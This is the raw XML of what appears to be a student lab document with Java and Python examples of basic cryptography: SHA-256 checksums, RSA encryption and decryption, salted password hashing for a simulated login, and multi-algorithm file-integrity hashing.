    <w:p w14:paraId="7C74B730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// Specify the file path to check (adjust as needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4AD8A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File file = new File("sample.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA25FC6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String checksum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>calculateSHA256</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C410432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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("SHA-256 Checksum: " + checksum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AE721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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591A538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/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17285">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74285837" w14:textId="77777777" w:rsidR="00A17285" w:rsidRPr="00A17285" w:rsidRDefault="00A17285" w:rsidP="00A17285">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="592" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C8160B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728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secure data transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D0098" w14:textId="77777777" w:rsidR="005B1CAC" w:rsidRDefault="005B1CAC" w:rsidP="005B1CAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="728" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB5617B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>import java.security.KeyPair;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69B1E2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>import java.security.KeyPairGenerator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9EADD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>import javax.crypto.Cipher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1714103B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>import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF6925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</w:p>
    <w:p w14:paraId="053195C0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>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A8A0A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public static KeyPair generateKeyPair() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E90AC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KeyPairGenerator generator = KeyPairGenerator.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("RSA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76211E07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generator.initialize(2048); // 2048-bit key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89E302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return generator.generateKeyPair();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6B64B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231C2ABF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</w:p>
    <w:p w14:paraId="0AA0B084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public static String encrypt(String message, java.security.PublicKey publicKey) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0643C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Cipher cipher = Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("RSA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132390D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cipher.init(Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ENCRYPT_MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, publicKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC366BD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byte[] encryptedBytes = cipher.doFinal(message.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39493149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return Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().encodeToString(encryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F48214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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F1AD3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</w:p>
    <w:p w14:paraId="4C24D729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public static String decrypt(String encryptedMessage, java.security.PrivateKey privateKey) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F16D0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Cipher cipher = Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("RSA");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FAF804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cipher.init(Cipher.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DECRYPT_MODE</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, privateKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05096BC0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byte[] decryptedBytes = cipher.doFinal(Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getDecoder</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().decode(encryptedMessage));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577645D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return new String(decryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605225CA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A80A6B3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</w:p>
    <w:p w14:paraId="44880595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public static void main(String[] args) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AF5D4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KeyPair keyPair = </w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>generateKeyPair</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5918C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        String originalMessage = "SecureMessage123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D5EEE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFBDB6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String encryptedMessage = </w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>encrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(originalMessage, keyPair.getPublic());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7D9C4C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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Encrypted Message: " + encryptedMessage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1FDC1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0AF8D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String decryptedMessage = </w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(encryptedMessage, keyPair.getPrivate());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB9746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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Decrypted Message: " + decryptedMessage);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F175D94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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DC810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/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1CAC">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669FE507" w14:textId="77777777" w:rsidR="005B1CAC" w:rsidRPr="005B1CAC" w:rsidRDefault="005B1CAC" w:rsidP="005B1CAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="728" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E02997C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9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hashed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passwords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 salting for user login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480CBF64" w14:textId="77777777" w:rsidR="00B563DE" w:rsidRDefault="00B563DE" w:rsidP="00B563DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="985" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0D93D6" w14:textId="1099459D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</w:p>
    <w:p w14:paraId="15ED380F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>import java.security.MessageDigest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C5D95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>import java.security.SecureRandom;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEEF791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>import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299C58BC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>import java.util.Scanner;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04DCB7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</w:p>
    <w:p w14:paraId="4B945011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>public class qwe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0721F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</w:p>
    <w:p w14:paraId="3EB6CFDA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// Generate a random salt as a Base64 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650A7B4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public static String generateSalt() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3E5F22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byte[] salt = new byte[16];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D484C6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new SecureRandom().nextBytes(salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F68F92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return Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().encodeToString(salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEC6C0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BB77A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</w:p>
    <w:p w14:paraId="34CA8363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// Hash a password with the given salt using SHA-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F2C0E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public static String hashPassword(String password, String salt) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9ECAD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MessageDigest md = MessageDigest.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>("SHA-256");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F298FA7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md.update(salt.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878B53C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byte[] hashed = md.digest(password.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CDA825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return Base64.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>().encodeToString(hashed);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B87C1D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E5B4B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</w:p>
    <w:p w14:paraId="738148A0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public static void main(String[] args) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC100C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// Simulate a user registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9061D1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String </w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "user1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A057760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String password = "securePassword";  // This is the correct password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC17FA9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String salt = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>generateSalt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004B2B73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String storedHash = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>hashPassword</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(password, salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE7EF7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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("User registered. Salt: " + salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9BFAC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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Stored Hash: " + storedHash);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AE799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</w:p>
    <w:p w14:paraId="3C43C8AD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// Simulate user login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F766480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Scanner scanner = new Scanner(System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA3932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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.print("Enter password for login: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597123EE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String inputPassword = scanner.nextLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C4976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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        String inputHash = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>hashPassword</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>(inputPassword, salt);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B1235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if(storedHash.equals(inputHash)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9622AB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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Authentication Successful!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCC26D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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527BB44D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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Authentication Failed!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0CC9B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75763FF4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    scanner.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54807856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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F956F74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/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B563DE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BCDC4" w14:textId="77777777" w:rsidR="00B563DE" w:rsidRPr="00B563DE" w:rsidRDefault="00B563DE" w:rsidP="00B563DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="985" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C6FCB2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862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(MD5,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SHA-256,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SHA-512)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 program to verify file integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D59715" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252A4EC0" w14:textId="77777777" w:rsidR="00CF7CE3" w:rsidRDefault="00CF7CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B4933F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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A81B386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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD0FB24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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F574B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</w:p>
    <w:p w14:paraId="51048919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def compute_hash(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C6E68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hashes = {"MD5": hashlib.md5(), "SHA-256": hashlib.sha256(), "SHA-512": hashlib.sha512()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F45BF5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print(f"Opening file: {file_path}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A78871E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with open(file_path, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE45DD1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print("Reading file in chunks...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0058D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while chunk := f.read(4096):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611B7E7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    for h in hashes.values():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C91646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        h.update(chunk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6850EC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return {name: h.hexdigest() for name, h in hashes.items()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F5513E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</w:p>
    <w:p w14:paraId="2F3A7364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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069A22F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file_path = input("Enter the path of the file to hash: ").strip('"\'')  # Remove quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7FE3A1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if not os.path.isfile(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C6963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print(f"Error: '{file_path}' does not exist or is not a file.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673C2E5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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208B36A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print(f"File found. Size: {os.path.getsize(file_path)} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D7DCD3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results = compute_hash(file_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F5309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print("\nHash Results:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E614593" w14:textId="77777777" w:rsidR="00CF7CE3" w:rsidRPr="00CF7CE3" w:rsidRDefault="00CF7CE3" w:rsidP="00CF7CE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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for name, digest in results.items():</w:t>
      </w:r>
    </w:p>
